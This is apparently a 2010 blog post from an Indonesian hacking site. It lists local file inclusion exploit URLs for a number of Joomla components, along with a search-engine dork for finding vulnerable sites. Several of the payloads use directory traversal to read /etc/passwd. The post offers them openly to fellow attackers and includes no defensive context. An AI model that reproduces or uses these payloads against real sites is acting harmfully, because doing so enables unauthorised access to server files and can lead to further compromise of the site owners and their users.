midads

You are Here: > Bug LFI injection

Senin, 02 Agustus 2010

Bug LFI injection


Salam Freedom, the SYSTEM IS NOT PERFECT, it is a slogan that is always on the Fly by hackers or crackers, whatever you agree?
please you answered himself, apart from that, on this night, why you are using Joomla in your website, maybe time for you to worry and be alert, maybe your web site has been in enter by a hacker or perhaps you are already a botnet domains, If yes, I say CONGRATULATIONS mean you have to feel alone and have got a proof, that the existing system did not use the secure internet, please improvement.
and make all my friends who to this day, still  to continue to grow, I had a little bug LFI that may be useful to "us"; :D



Xploit :LFI Vulnerability

Demo Url :http://server/component/music/album.html?cid=[LFI]

#######################################################################################################


======================================================================

 [?] Script : SEF (Search Engine Friendly)

   [?] Home Script : http://www.joomla.com/

   [?] Dork/String :  "index.php?option=com_sef" / "com_sef"

   [?] Date :  04, July 2010

=====================================================================

Xploit:com_jejob LFI Vulnerability

DEMO URL : http://server/jobcomponent/index.php?option=com_jejob&view=[LFI]

=====================================================================

Xploit:jeeventcalenda LFI

DEMO URL : http://server/component/jeeventcalendar/?view=[LFI]

=====================================================================

Xploit:LFI Vulnerability

DEMO URL : http://server/demo/components/je-media-player.html?view=../../

=====================================================================

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_picasa2gallery&controller=[INDONESIANCODER]

=====================================================================

http://server/shared/help.php?page=../../../../../../../../../../../../../../../etc/passwd

=====================================================================

[*] Exploit

http://[site]//index.php?option=com_g2bridge&controller=[LFI]

=====================================================================

[+] [ Live From Jogja ] [+]

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_mediqna&controller=[INDONESIANCODER]

=====================================================================

[ Vulnerable File ]

http://127.0.0.1//index.php?option=com_simpledownload&controller=[LFI BY ARUMBIA]

==================================================================

[ Vulnerable File ]


http://127.0.0.1/index.php?option=com_mscomment&controller=[INDONESIANCODER]

Poc/Exploit:

~~~~~~~~~

=====================================================================

http://127.0.0.1/[path]/index.php?option=com_dioneformwizard&controller=[LFI]

=====================================================================

http://127.0.0.1/index.php?option=com_php&file=../images/phplogo.jpg

http://127.0.0.1/index.php?option=com_php&file=../js/ie_pngfix.js

http://127.0.0.1/index.php?option=com_php&file=../../../../../../../../../../etc/passwd

Related Articles :


Stumble
Delicious
Technorati
Twitter
Facebook

 

0 komentar:

Posting Komentar

VIDEO

ENTER-TAB1-CONTENT-HERE

RECENT POSTS

ENTER-TAB2-CONTENT-HERE

POPULAR POSTS

ENTER-TAB3-CONTENT-HERE
 

Portal Bebas Copyright © 2010 Premium Wordpress Themes | Website Templates | Blogger Template is Designed by Lasantha.